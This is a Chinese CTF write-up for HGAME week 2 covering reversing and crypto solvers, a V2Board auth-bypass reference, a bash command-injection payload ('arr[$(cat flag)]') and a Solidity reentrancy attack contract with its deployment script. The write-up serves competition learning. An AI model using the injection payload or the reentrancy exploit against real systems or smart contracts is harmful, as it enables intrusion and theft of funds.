hgame2023-week2

hgame2022-week2

web

Git Leakage

githack 直接就看见了

v2board

[V2Board Admin.php 越权访问漏洞 | PeiQi文库](http://wiki.peiqi.tech/wiki/webapp/V2Board/V2Board Admin.php 越权访问漏洞.html)

Reverse

before_main

换表base64

你直接看的表不一定是真的

math

有意思的点在 &savedregs-0x170 == v8

import numpy as np

v12 = np.array([63998,33111,67762,54789,61979,69619,37190,70162,53110,68678,63339,30687,66494,50936,60810,48784,30188,60104,44599,52265,43048,23660,43850,33646,44270])
v12.shape = (5,5)

v10 = np.array([126,225,62,40,216,253,20,124,232,122,62,23,100,161,36,118,21,184,26,142,59,31,186,82,79])
v10.shape = (5,5)

v10_inv = np.linalg.inv(v10)

flag = v12 @ v10_inv
np.around(flag, decimals=0, out=flag)

flag_str = ''
for i in flag:
    for j in i:
        flag_str += chr(int(j))

print (flag_str)

stream

logo一眼真python

虚拟机解包 stream.pyc

pycdc 反编译但反编译了给寂寞 给我的是字节码

(pycdc 是用cmake编译的 当时编译成pycdas了 编译pycdc.exe就ok了

import base64

def gen(key):
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + ord(key[i % len(key)])) % 256
        tmp = s[i]
        s[i] = s[j]
        s[j] = tmp
    i = j = 0
    data = []
    for _ in range(50):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        tmp = s[i]
        s[i] = s[j]
        s[j] = tmp
        data.append(s[(s[i] + s[j]) % 256])
    return data


def encrypt(text, key):
    result = ''
    for c, k in zip(text, gen(key)):
        result += chr(ord(c) ^ k)
    result = base64.b64encode(result.encode()).decode()
    return result

text = input('Flag: ')
key = 'As_we_do_as_you_know'
enc = encrypt(text, key)
if enc == 'wr3ClVcSw7nCmMOcHcKgacOtMkvDjxZ6asKWw4nChMK8IsK7KMOOasOrdgbDlx3DqcKqwr0hw701Ly57w63CtcOl':
    print('yes!')
    return None
None('try again...')

ChatGPT：无所谓，我会出手。

不知道为啥只有随波逐流好使 有没有密码神解释一下。。。

VidarCamera

jadx正常逆向 无壳

看代码逻辑 先转int再xtea加密再比对

for (int i = 0; i < 40; i += 4) {
    UIntArray.m178setVXSXFK8(r3, i / 4, obj.charAt(i)
            + obj.charAt(i + 1) << 8
                    + obj.charAt(i + 2) << 16
                            + obj.charAt(i + 3) << 24);

char转int 直接看就行

下面是加密函数 xtea

private final int[] m0encrypthkIa6DI(int[] iArr) {
    int i;
    int[] r1 = UIntArray.m167constructorimpl(4);
    UIntArray.m178setVXSXFK8(r1, 0, 2233);
    UIntArray.m178setVXSXFK8(r1, 1, 4455);
    UIntArray.m178setVXSXFK8(r1, 2, 6677);
    UIntArray.m178setVXSXFK8(r1, 3, 8899);
    int i2 = 0;
    while (i2 < 9) {
        int i3 = 0;
        int i4 = 0;
        do {
            i3++;
            i = i2 + 1;
            UIntArray.m178setVXSXFK8(iArr, i2, UInt.m114constructorimpl(UIntArray.m173getpVg5ArA(iArr, i2) + UInt.m114constructorimpl(UInt.m114constructorimpl(UInt.m114constructorimpl(UIntArray.m173getpVg5ArA(r1, UInt.m114constructorimpl(i4 & 3)) + i4) ^ UInt.m114constructorimpl(UInt.m114constructorimpl(UInt.m114constructorimpl(UIntArray.m173getpVg5ArA(iArr, i) << 4) ^ UInt.m114constructorimpl(UIntArray.m173getpVg5ArA(iArr, i) >>> 5)) + UIntArray.m173getpVg5ArA(iArr, i))) ^ i4)));
            UIntArray.m178setVXSXFK8(iArr, i, UInt.m114constructorimpl(UIntArray.m173getpVg5ArA(iArr, i) + UInt.m114constructorimpl(UInt.m114constructorimpl(UInt.m114constructorimpl(UInt.m114constructorimpl(UIntArray.m173getpVg5ArA(iArr, i2) << 4) ^ UInt.m114constructorimpl(UIntArray.m173getpVg5ArA(iArr, i2) >>> 5)) + UIntArray.m173getpVg5ArA(iArr, i2)) ^ UInt.m114constructorimpl(UIntArray.m173getpVg5ArA(r1, UInt.m114constructorimpl(UInt.m114constructorimpl(i4 >>> 11) & 3)) + i4))));
            i4 = UInt.m114constructorimpl(i4 + 878077251);
        } while (i3 <= 32);
        i2 = i;
    }
    return iArr;
}

手工代码优化（出题人来挨打

    private final int[] m0encrypthkIa6DI(int[] iArr) {
        int i;
        int[] r1 = new int[4];
        r1[0] = 2233;
        r1[1] = 4455;
        r1[2] = 6677;
        r1[3] = 8899;
        int i2 = 0;
        while (i2 < 9) {
            int i3 = 0;
            int i4 = 0;
            do {
                i3++;
                i = i2 + 1;
                iArr[i2]=iArr[i2] + (((r1[i4 & 3]+ i4)^ (((iArr[i] << 4)^ (iArr[i] >>> 5))+ iArr[i]))^ i4);
                iArr[i]= iArr[i]  + ((((iArr[i2] << 4)^(iArr[i2] >>> 5))+iArr[i2])^(r1[(i4 >>> 11)& 3]+ i4));
                i4 = i4 + 878077251;
            } while (i3 <= 32);
            i2 = i;
        }
        return iArr;
    }

注意三点

1. i2<i
2. iArr[i2]=iArr[i2] + (((r1[i4 & 3]+ i4)^ (((iArr[i] << 4)^ (iArr[i] >>> 5))+ iArr[i]))^ i4);这里跟原xtea多了^i4即^sum
3. 循环33次

#include <stdio.h>
#include <stdint.h>

int flag[10] = {637666042,457511012,-2038734351,578827205,-245529892,-1652281167,435335655,733644188,705177885,-596608744};
unsigned int key[4] = {2233,4455,6677,8899};

void encipher(unsigned int num_rounds, uint32_t v[2]) {
    unsigned int i;
    uint32_t v0=v[0], v1=v[1], sum=0, delta=878077251;
    for (i=0; i < num_rounds; i++) {
        v0 += ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3])) ^ sum;
        v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum>>11) & 3]);
        sum += delta;
    }
    v[0]=v0; v[1]=v1;
}

void decipher(unsigned int num_rounds, uint32_t v[2]) {
    unsigned int i;
    uint32_t v0=v[0], v1=v[1], delta=878077251, sum=delta*num_rounds;
    for (i=0; i < num_rounds; i++) {
        sum -= delta;
        v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum>>11) & 3]);
        v0 -= ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3])) ^ sum;
    }
    v[0]=v0; v[1]=v1;
}

int main()
{
    for (int i = 8; i >= 0; i--)
    {
        decipher(33, (uint32_t *)&flag[i]);
    }
    char *p = (char *)flag;
    for (int i = 0; i < 40; i++)
    {
        printf("%c", p[i]);
    }
}

Crypto

Rabin

包里有什么

import gmpy2
from libnum import n2s

m = 1528637222531038332958694965114330415773896571891017629493424
b0 = 69356606533325456520968776034730214585110536932989313137926
c = 93602062133487361151420753057739397161734651609786598765462162
w = b0 // 2
#l = m.bit_length()-2
l = 198
a = [2 << i for i in range(l)]
key = ""
c1 = c*gmpy2.invert(w, m) % m
for i in a[::-1]:
    if c1 >= i:
        key+="1"
        c1 -= i
    else:
        key+="0"
print(n2s(int(key[::-1], 2)))

RSA 大冒险1

很有意思 模拟了真实情况

1：除p撇yafu分解

2：加密两次 模不互素

3：小e攻击

4：加密两次 共模攻击

Misc

Tetris Master

非预期了属于是

ctrl+c

Sign In Pro Max

part1 base64 base58 base32

part2-4 somd5解密

part5 凯撒

crazy_qrcode

修复二维码

拿到密码

[1, 2, ?, 3, ?, 0, 3, ?, ?, 3, ?, 0, 3, 1, 2, 1, 1, 0, 3, 3, ?, ?, 2, 3, 2]

按照顺序拼 在根据给的数*90° 慢慢拼

Tetris Master Revenge

bytectf2022 bash_game原题

EDI wp

arr[$(cat flag)]

BlockChain

VidarBank

经典重入攻击

构造恶意合约

// SPDX-License-Identifier: UNLICENSED
pragma solidity >=0.8.7;

import "./VidarBank.sol";

contract Attack{
    VidarBank public vidarBank;
    constructor(address _vidarBank) {
        vidarBank = VidarBank(_vidarBank);
    }

    function getNewAccount() public payable{
        require(msg.value >= 0.0001 ether);
        vidarBank.newAccount{value: 0.0001 ether}();
    }

    function pwnDonateOnce() public {
        vidarBank.donateOnce();
    }

    fallback () payable external {
        if (vidarBank.getBalance() >= 30) {
            vidarBank.isSolved();
        }
        vidarBank.donateOnce();
    }
}

部署 调用就完了

import json
from eth_account import Account
from web3 import Web3
import time

private_key = "" # 私钥

web3 = Web3(Web3.HTTPProvider('http://week-2.hgame.lwsec.cn:30191/'))

connected = web3.isConnected()  # 检查是否连接成功
print(connected)

account = Account.privateKeyToAccount(private_key)


with open('attack_sol_Attack.abi', 'r') as f:
    abi = json.load(f)

with open('attack_sol_Attack.bin', 'r') as f:
    bytecode = f.read()

contract = web3.eth.contract(abi=abi, bytecode=bytecode)

# 被攻击的合约地址
contractAttackedAddress = "0x01E4c8e701eE9d52Cb6c15DdA211Dd24a74661a5"
contractAttackedAddress = web3.toChecksumAddress(contractAttackedAddress)

# 部署合约
contract = contract.constructor(contractAttackedAddress).build_transaction({
    'from': account.address,
    'nonce': web3.eth.getTransactionCount(account.address),
    'gas': 1728712,
    'gasPrice': web3.toWei('22', 'gwei')
})
signed = account.signTransaction(contract)
tx_hash = web3.eth.sendRawTransaction(signed.rawTransaction)
tx_receipt = web3.eth.waitForTransactionReceipt(tx_hash)
print(tx_receipt)

# 获取合约地址
contractAddress = web3.toChecksumAddress(tx_receipt.contractAddress)

# 调用合约
contract = web3.eth.contract(address=contractAddress, abi=abi)

# 调用合约的方法
tx = contract.functions.getNewAccount().buildTransaction({
    'gas': 1000000,
    'gasPrice': web3.toWei('100', 'gwei'),
    'from': account.address,
    'nonce': web3.eth.getTransactionCount(account.address),
    'value': web3.toWei('0.00011', 'ether')
})

signed = account.signTransaction(tx)
tx_id = web3.eth.sendRawTransaction(signed.rawTransaction)
tx_receipt = web3.eth.waitForTransactionReceipt(tx_id)
print("调用合约的方法: getNewAccount", tx_receipt)

# 调用合约攻击方法
tx = contract.functions.pwnDonateOnce().buildTransaction({
    'gas': 1000000,
    'gasPrice': web3.toWei('100', 'gwei'),
    'from': account.address,
    'nonce': web3.eth.getTransactionCount(account.address)
})

signed = account.signTransaction(tx)
tx_id = web3.eth.sendRawTransaction(signed.rawTransaction)
tx_receipt = web3.eth.waitForTransactionReceipt(tx_id)
print("调用合约的方法: pwnDonateOnce", tx_receipt)

把最后的hash给nc

Transfer

因为对remix不熟悉 耽误一血了 呜呜呜 二血也不错！

selfdestruct()

// SPDX-License-Identifier: UNLICENSED
pragma solidity >=0.8.7;

contract Attack{
    uint public balance = 0;

    function destruct(address payable _to) external payable {
        selfdestruct(_to);
    }
    
    function deposit() external payable {
        balance += msg.value;
    }

}

remix 部署 给合约打钱 在销毁就行了

（期待出题人说的第二种方法。。。

IoT

Pirated router

解包 在bin发现 secret_program arm64的

router是mips32 显然不对劲

没arm设备 不想用qemu 直接逆向吧 就一个异或

Pirated keyboard

流量抠出

zihiui_NB_666}

与源代码比较发现

I与H互换

zhihuh_NB_666}

pdf多东西

打开直接发现

hgame{peng_zhihuh_NB_666}